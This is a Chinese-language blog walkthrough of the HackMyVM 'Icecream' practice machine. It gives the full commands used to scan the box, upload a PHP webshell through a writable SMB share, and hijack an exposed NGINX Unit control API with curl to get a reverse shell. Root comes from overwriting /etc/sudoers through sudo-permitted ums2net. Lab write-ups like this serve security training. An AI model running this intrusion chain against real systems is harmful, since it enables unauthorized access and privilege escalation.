去找Todd
HMV Icecream
Todd
  2024-10-09 14:58:46   2024-10-16 16:44:59   2.9k 字  16 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
IP=192.168.0.191
nmap -sV -sC -T4 -Pn -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 03:04 EDT
Nmap scan report for 192.168.0.191
Host is up (0.00016s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)
|_  256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)
80/tcp   open  http        nginx 1.22.1
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.22.1
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
9000/tcp open  cslistener?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Server: Unit/1.33.0
|     Date: Wed, 09 Oct 2024 07:04:45 GMT
|     Content-Type: application/json
|     Content-Length: 40
|     Connection: close
|     "error": "Value doesn't exist."
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Unit/1.33.0
|     Date: Wed, 09 Oct 2024 07:04:45 GMT
|     Content-Type: application/json
|     Content-Length: 1042
|     Connection: close
|     "certificates": {},
|     "js_modules": {},
|     "config": {
|     "listeners": {},
|     "routes": [],
|     "applications": {}
|     "status": {
|     "modules": {
|     "python": {
|     "version": "3.11.2",
|     "lib": "/usr/lib/unit/modules/python3.11.unit.so"
|     "php": {
|     "version": "8.2.18",
|     "lib": "/usr/lib/unit/modules/php.unit.so"
|     "perl": {
|     "version": "5.36.0",
|     "lib": "/usr/lib/unit/modules/perl.unit.so"
|     "ruby": {
|     "version": "3.1.2",
|     "lib": "/usr/lib/unit/modules/ruby.unit.so"
|     "java": {
|     "version": "17.0.11",
|     "lib": "/usr/lib/unit/modules/java17.unit.so"
|     "wasm": {
|     "version": "0.1",
|     "lib": "/usr/lib/unit/modules/wasm.unit.so"
|   HTTPOptions:
|     HTTP/1.1 405 Method Not Allowed
|     Server: Unit/1.33.0
|     Date: Wed, 09 Oct 2024 07:04:45 GMT
|     Content-Type: application/json
|     Content-Length: 35
|     Connection: close
|_    "error": "Invalid method."
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9000-TCP:V=7.94SVN%I=7%D=10/9%Time=67062B13%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,4A8,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Unit/1\.33\.0\r\n
SF:Date:\x20Wed,\x2009\x20Oct\x202024\x2007:04:45\x20GMT\r\nContent-Type:\
SF:x20application/json\r\nContent-Length:\x201042\r\nConnection:\x20close\
SF:r\n\r\n{\r\n\t\"certificates\":\x20{},\r\n\t\"js_modules\":\x20{},\r\n\
SF:t\"config\":\x20{\r\n\t\t\"listeners\":\x20{},\r\n\t\t\"routes\":\x20\[
SF:\],\r\n\t\t\"applications\":\x20{}\r\n\t},\r\n\r\n\t\"status\":\x20{\r\
SF:n\t\t\"modules\":\x20{\r\n\t\t\t\"python\":\x20{\r\n\t\t\t\t\"version\"
SF::\x20\"3\.11\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/modules/pytho
SF:n3\.11\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"php\":\x20{\r\n\t\t\t\t\"
SF:version\":\x20\"8\.2\.18\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/modu
SF:les/php\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"perl\":\x20{\r\n\t\t\t\t
SF:\"version\":\x20\"5\.36\.0\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/mo
SF:dules/perl\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"ruby\":\x20{\r\n\t\t\
SF:t\t\"version\":\x20\"3\.1\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/
SF:modules/ruby\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"java\":\x20{\r\n\t\
SF:t\t\t\"version\":\x20\"17\.0\.11\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/u
SF:nit/modules/java17\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"wasm\":\x20{\
SF:r\n\t\t\t\t\"version\":\x20\"0\.1\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/
SF:unit/modules/wasm\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t")%r(HTTPOptions,C
SF:7,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x20Unit/1\.3
SF:3\.0\r\nDate:\x20Wed,\x2009\x20Oct\x202024\x2007:04:45\x20GMT\r\nConten
SF:t-Type:\x20application/json\r\nContent-Length:\x2035\r\nConnection:\x20
SF:close\r\n\r\n{\r\n\t\"error\":\x20\"Invalid\x20method\.\"\r\n}\r\n")%r(
SF:FourOhFourRequest,C3,"HTTP/1\.1\x20404\x20Not\x20Found\r\nServer:\x20Un
SF:it/1\.33\.0\r\nDate:\x20Wed,\x2009\x20Oct\x202024\x2007:04:45\x20GMT\r\
SF:nContent-Type:\x20application/json\r\nContent-Length:\x2040\r\nConnecti
SF:on:\x20close\r\n\r\n{\r\n\t\"error\":\x20\"Value\x20doesn't\x20exist\.\
SF:"\r\n}\r\n");
MAC Address: 08:00:27:EA:54:0F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: -7s
| smb2-time:
|   date: 2024-10-09T07:04:45
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.51 seconds

Web 服务

先扫一波 80 端口的目录

1
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -x php,txt,html,zip

没扫到啥东西。
看看 9000 端口是个啥

1
2
3
4
5
6
gobuster dir -u http://$IP:9000 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -x php,txt,html,zip

/config               (Status: 200) [Size: 62]
/status               (Status: 200) [Size: 862]
/certificates         (Status: 200) [Size: 4]

看了一眼上面的 nmap 结果,返回的 json 和这里的目录名字有点像,看到了

1
2
3
4
5
6
"connections": {
            "accepted": 0,
            "active": 0,
            "idle": 0,
            "closed": 0
        },

这一段,猜测这个服务是一个 web 服务的状态监控。看了下响应头,是 Unit/1.33.0,去搜了下,是一个 Nginx 的 application runtime . 听起来这意思是类似于 apache 的 mod_php 之类的东西。之前 nginx 并不提供 php 的解释器,需要借助第三方模块 php-fpm,这个 unit 似乎就干了这个事儿。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
"modules": {
            "python": {
                "version": "3.11.2",
                "lib": "/usr/lib/unit/modules/python3.11.unit.so"
            },
            "php": {
                "version": "8.2.18",
                "lib": "/usr/lib/unit/modules/php.unit.so"
            },
            "perl": {
                "version": "5.36.0",
                "lib": "/usr/lib/unit/modules/perl.unit.so"
            },
            "ruby": {
                "version": "3.1.2",
                "lib": "/usr/lib/unit/modules/ruby.unit.so"
            },
            "java": {
                "version": "17.0.11",
                "lib": "/usr/lib/unit/modules/java17.unit.so"
            },
            "wasm": {
                "version": "0.1",
                "lib": "/usr/lib/unit/modules/wasm.unit.so"
            },
            "wasm-wasi-component": {
                "version": "0.1",
                "lib": "/usr/lib/unit/modules/wasm_wasi_component.unit.so"
            }
        },

SMB 服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
smbclient -L //$IP

Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        icecream        Disk      tmp Folder
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.0.191 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

利用 icecream 登录

1
2
3
4
5
6
7
smbclient //$IP/icecream -U icecream

systemd-private-316958a127774e8999c7e14213a3bf9d-systemd-logind.service-GSf4CG      D        0  Wed Oct  9 03:03:41 2024
systemd-private-316958a127774e8999c7e14213a3bf9d-systemd-timesyncd.service-MPGNuI      D        0  Wed Oct  9 03:03:40 2024
# 看起来这个目录是 /tmp
smb: \> put 1.php

webshell 传上去了。本地监听

1
pwncat -l -p 1234

然后去 80 访问了下,1.php 果然,webshell 拿到。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
(remote) www-data@icecream:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
ice:x:1000:1000:ice,,,:/home/ice:/bin/bash
unit:x:999:995:unit user:/nonexistent:/bin/false

然后就是提权了。

提权 ice

翻了下 web 目录并没有啥东西。www-data 也没有 sudo -l,感觉学来的竟然,直接上 pspy64 看。

首先没有啥定时任务,想到之前的 9000 端口还没用,而且有这个进程:

1
2024/10/09 11:26:31 CMD: UID=0     PID=486    | unit: main v1.33.0 [/usr/sbin/unitd --control 0.0.0.0:9000 --user ice]

如果是 ice 用户的,那大概率就是从这里入手了。但是对这个 Unit 并不了解,去看了看官方文档 Unit
发现这个 controlapi 可以控制 unit,甚至可以自己创建一个 php 的 Application。不过官方的都是本地通过 curl 和 –unix-socket 来控制的,我们这个直接可以用 9000 端口来搞。

这么一想,其实如果熟悉这个 unit 的话,直接就可以通过这个 9000 端口来提权了。不用去第一步拿 www-data。

经过研究,总结了几个 curl 的命令:

1
2
3
4
5
curl -X PUT -d '{"app":{"type":"php","root":"/tmp","script":"2.php"}}' http://192.168.0.191:9000/config/applications

curl -X PUT -d '[{"action":{"share":"/tmp/2.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.0.191:9000/config/routes

curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.0.191:9000/config/listeners

分别添加了一个 php 的应用,一个路由,一个监听器。然后就可以通过 8888 端口访问了。

1
2
# 本地监听 2.php 中的 端口
pwncat -l -p 8889

访问 http://192.168.0.191:8888/2.php,拿到了 ice 的 shell。

1
2
3
4
5
6
7
8
9
10
(remote) ice@icecream:/$ id
uid=1000(ice) gid=1000(ice) grupos=1000(ice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth)

(remote) ice@icecream:/home/ice$ sudo -l;
Matching Defaults entries for ice on icecream:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ice may run the following commands on icecream:
    (ALL) NOPASSWD: /usr/sbin/ums2net

提权 root

man 了一下 ums2net,发现是一个 USB Mass Storage to Network 的工具,可以将 USB 设备的内容共享到 TCP 上,然后就可以用 nc 去写入 USB 了。
翻了下项目的 github

How to use ums2net

  1. Insert the USB Mass Storage. Check /dev/disk/by-id/ for the unique path
    for that device.
  2. Create a config file base on the above path. Please see the config file
    format section.
  3. Run “ums2net -c“. ums2net will become a daemon in the
    background. For debugging please add “-d” option to avoid detach.
  4. Use nc to write your image to the USB Mass Storage device. For example,
    “nc -N localhost 29543 < warp7.img”

Config file

Each line in the config file maps a TCP port to a device. All the options are
separated by space. The first argument is a number represents the TCP port.
And the rest of the arguments are in dd-style. For example,

A line in the config file:

1
"29543 of=/dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096"

It means TCP port 29543 is mapped to /dev/disk/by-id/> usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 and the block size is 4096.

Currently we only support “of” and “bs”.

听起来就像是用 tcp 版本的 dd。既然是 root 权限,并且能写,我第一个反应就是写入 authorized_keys,然后 ssh 登录。

1
2
echo "8889 of=/root/.ssh/authorized_keys bs=4096" > config
sudo /usr/sbin/ums2net -c config -d

然后本地 nc 连接

1
nc -N  $IP 8889 < ~/.ssh/id_rsa.pub

结果报错:

1
ums2net[14352]: Device /root/.ssh/authorized_keys not appeared. Close immediately.

看来是文件不存在,最后经过 ll104567 大佬提点,用写入 sudoers 文件的方式来提权。

1
2
3
echo "8889 of=/etc/sudoers" > config
sudo /usr/sbin/ums2net -c config -d

然后本地 nc 连接

1
echo 'ice ALL=(ALL) NOPASSWD: ALL'|nc $IP 8889

再回去执行 sudo -l,果然有了。

1
2
3
sudo su -
root@icecream:~# pwd
/root

虽然有个因为写了 sudoers 文件换行导致的错误,但是还是成功拿到 root。

完结撒花。🎉

HMV Icecream
2024/10/09/hmv-Icecream/
作者
Todd
发布于
2024-10-09 14:58
许可
  1. 1. 信息收集
    1. 1.1. 服务探测
    2. 1.2. Web 服务
    3. 1.3. SMB 服务
  2. 2. 提权 ice
  3. 3. 提权 root
    1. 3.1. How to use ums2net
    2. 3.2. Config file
© 2018 - 2024    Todd
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 74.6k 访客数 访问量
  1. 1. 信息收集
    1. 1.1. 服务探测
    2. 1.2. Web 服务
    3. 1.3. SMB 服务
  2. 2. 提权 ice
  3. 3. 提权 root
    1. 3.1. How to use ums2net
    2. 3.2. Config file